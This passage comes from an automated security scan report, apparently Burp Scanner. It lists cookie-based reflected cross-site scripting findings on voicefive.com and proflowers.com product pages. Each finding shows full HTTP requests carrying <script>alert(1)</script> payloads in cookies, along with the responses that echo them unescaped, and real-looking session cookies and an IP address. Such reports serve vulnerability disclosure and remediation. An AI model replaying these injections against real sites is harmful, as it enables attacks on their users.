Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&60c44<script>alert(1)</script>36b26e72378; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19861

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
t Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&60c44<script>alert(1)</script>36b26e72378', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&' };
COMSCORE.BMX.Buddy.ServerTimeEpoch="1297448662";COMSCORE.BMX.Buddy.start((
...[SNIP]...

2.114. http://ar.voicefive.com/bmx3/node_hulu.pli [ar_p85001580 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/node_hulu.pli

Issue detail

The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload 288b0<script>alert(1)</script>4b2f2492765 was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/node_hulu.pli HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hulu.com/plus?src=topnav
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&288b0<script>alert(1)</script>4b2f2492765; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:24:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 19861

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Buddy)!="undefined"){}else{if(typeof(COMSCORE)=="undefined"){var COMSCORE={};
}if(typeof(COMSCORE.BMX)=="undef
...[SNIP]...
011&prad=55352400&cpn=4&arc=38899481&', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&288b0<script>alert(1)</script>4b2f2492765', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5
...[SNIP]...

2.115. http://products.proflowers.com/flowers/15-Sweetheart-Tulips-with-Chocolates-30007882 [PFC_BrowserId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/15-Sweetheart-Tulips-with-Chocolates-30007882

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36625</script><script>alert(1)</script>aaeb634691b was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /flowers/15-Sweetheart-Tulips-with-Chocolates-30007882 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f36625</script><script>alert(1)</script>aaeb634691b; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?30007882&2/11/2011 2:36:43 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:36:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:36:43 GMT
Connection: close
Content-Length: 150824


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
t="Product";
resx.links="30007882;42954;41213;30043943;30050119;";
resx.itemid = "30007882";
resx.qty="1";
resx.price="19.99";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f36625</script><script>alert(1)</script>aaeb634691b";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv
...[SNIP]...

2.116. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [PFC_BrowserId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/18-Red-Roses-30050119

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48ef4</script><script>alert(1)</script>fc8f59adbce was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=xsbbevdz1a3ssdqbzxeccj03; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:32:14 AM; PRVD=SiteSplitID=72; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f48ef4</script><script>alert(1)</script>fc8f59adbce; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253APortals%25253AHIC%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/18-Red-Roses-30050119%25253Fviewpos%25253D2%252526trackingpgroup%25253DHIC%252526ref%25253Dfgvprt%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:41:57 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:41:57 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:41:57 GMT
Content-Length: 164424


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

resx.links="30050119;30007363;30048203;30049945;41213;30043943;";
resx.itemid = "30050119";
resx.qty="1";
resx.price="29.99";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f48ef4</script><script>alert(1)</script>fc8f59adbce";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "HIC";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...

2.117. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [PFC_BrowserId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/20-Sweetheart-Tulips-30007357

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59bff</script><script>alert(1)</script>8b3e455c6b7 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef&PageSplit= HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRVD=SiteSplitID=72; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM; mr_referredVisitor=0; RES_TRACKINGID=354557859711349; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84f59bff</script><script>alert(1)</script>8b3e455c6b7; PFC_PersInfo=; s_cc=true; RES_SESSIONID=687108066631481; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253Dpfc%25253ALanding%25253AHome%2526pidt%253D1%2526oid%253Dhttp%25253A//products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357%25253Fviewpos%25253D1%252526trackingpgroup%25253DHPM%252526ti%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=zgmozekoxgz51n2gdyx3kw0z; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:33:34 AM?30007357&2/11/2011 10:59:25 AM; domain=.proflowers.com; expires=Thu, 12-May-2011 17:59:25 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 18:59:25 GMT
Content-Length: 155561


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
Product";
resx.links="30007357;30007828;41213;30043943;30050119;";
resx.itemid = "30007357";
resx.qty="1";
resx.price="29.98";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84f59bff</script><script>alert(1)</script>8b3e455c6b7";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "HPM";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...

2.118. http://products.proflowers.com/flowers/A-Valentines-Romance-30046586 [PFC_BrowserId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/A-Valentines-Romance-30046586

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8f0f</script><script>alert(1)</script>745aa2b3095 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /flowers/A-Valentines-Romance-30046586 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84fa8f0f</script><script>alert(1)</script>745aa2b3095; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?30046586&2/11/2011 2:35:24 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:35:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:35:24 GMT
Connection: close
Content-Length: 153216


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
t";
resx.links="30046586;30002134;40802;30007219;40753;30050119;";
resx.itemid = "30046586";
resx.qty="1";
resx.price="99.99";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84fa8f0f</script><script>alert(1)</script>745aa2b3095";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv
...[SNIP]...

2.119. http://products.proflowers.com/flowers/Three-Dozen-Long-Stemmed-Red-Roses-with-FREE-Ruby-Vase-40752 [PFC_BrowserId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Three-Dozen-Long-Stemmed-Red-Roses-with-FREE-Ruby-Vase-40752

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdc34</script><script>alert(1)</script>5e638967398 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /flowers/Three-Dozen-Long-Stemmed-Red-Roses-with-FREE-Ruby-Vase-40752 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84ffdc34</script><script>alert(1)</script>5e638967398; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?40752&2/11/2011 2:35:40 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:35:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:35:40 GMT
Connection: close
Content-Length: 146237


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
uct";
resx.links="40752;30046428;30006291;40753;30046428;30050119;";
resx.itemid = "40752";
resx.qty="1";
resx.price="119.99";
resx.total="";
resx.customerid="41f9dda9-9db3-4eb3-80d0-0479607be84ffdc34</script><script>alert(1)</script>5e638967398";
resx.transactionid = "";


resx.cv2 = "pfc";
resx.cv3 = "";
resx.cv4 = "72";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx.cv
...[SNIP]...

2.120. http://products.proflowers.com/flowers/Valentines-Day-Bouquet-30045703 [PFC_BrowserId cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Valentines-Day-Bouquet-30045703

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d481f</script><script>alert(1)</script>4377d2f310b was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /flowers/Valentines-Day-Bouquet-30045703 HTTP/1.1
Host: products.proflowers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=687108066631481; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=2/11/2011 10:49:21 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,pfb-3,phl-2,pjt-4,pju-4,pbp-3,pjv-5,psb-4,pvo-1,pmt-2,xpb-1,pvm-1,poe-3,zzc-2,pjs-4,pcu-1,pfl-3,prf-3,pec-1,mpsmediapersonalitysplit-2,ntd-1,pbo-2,nte-2,ntc-2,ppv-2,pfp-3,phr-1,zza-1,psv-4,nta-2,pbl-1,ntb-2,pmo-1,ppr-2,prl-4,xpc-1,psr-2,pbr-3,pcy-7,zzb-1,gfr-1,apg-1,ppe-1,pcb-1; ENDOFDAY_PFC=TestAssignmentValues=; BrowsingStore=zgmozekoxgz51n2gdyx3kw0z; mr_referredVisitor=0; PFC_PersInfo=; PRVD=SiteSplitID=72; s_cc=true; PFC_BrowserId=41f9dda9-9db3-4eb3-80d0-0479607be84fd481f</script><script>alert(1)</script>4377d2f310b; s_vi=[CS]v1|26AAC068051481C2-6000018C8039CEE6[CE]; RES_TRACKINGID=354557859711349; CURRENTSESSION_=IPAddress=173.193.214.243; ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM; ASP.NET_SessionId=xsbbevdz1a3ssdqbzxeccj03;

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050119&2/11/2011 10:52:56 AM?30045703&2/11/2011 2:36:13 PM; domain=.proflowers.com; expires=Thu, 12-May-2011 21:36:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 22:36:13 GMT
Connection: close
Content-Length: 157725


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
resx.links="30045703;43633;30046586;42846;30046427;5519;30050119;";
resx.itemid = "30045703";
resx.qty="1";
resx.price="59.99";
resx.total="";
